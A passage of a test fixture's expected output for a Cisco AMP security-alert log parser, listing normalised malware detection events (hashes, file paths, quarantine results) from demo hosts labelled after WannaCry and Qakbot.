"mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 20287, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:03.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 950000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229322845880000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 21793, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056775", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 23391, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056774", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 24592, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056773", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 25793, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056775", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "qYf.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 26906, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056774", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "4191700.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 28140, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056773", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 29393, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:09:00.000Z", + "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", + "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1493058569636000800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "event.start": "2021-01-14T14:09:00.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/Windows/SysWOW64/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 30752, + "process.hash.sha256": "b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:46:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6264772016730013699", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 611000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772016730014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 32509, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:46:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D5221F6847-100.SBX.TG", + "cisco.amp.detection_id": "6264772016730013699", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 65000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772016730014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "48a0bf05b9706a00d2a0ff6260412f11", + "file.hash.sha1": "5058b16a86beee96927371210b9a9f682976a50a", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 33628, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "48a0bf05b9706a00d2a0ff6260412f11", + "5058b16a86beee96927371210b9a9f682976a50a" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:45:59.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D5221F6847-100.SBX.TG", + "cisco.amp.detection_id": "6264772012435046402", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 940000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772012435046000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "Unconfirmed 762952.crdownload", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34974, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214500913741862", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 724000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 36260, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741862", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 366000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 37453, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741859", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 38805, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 5580, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741858", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 210000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40328, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741855", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 194000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 41673, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + 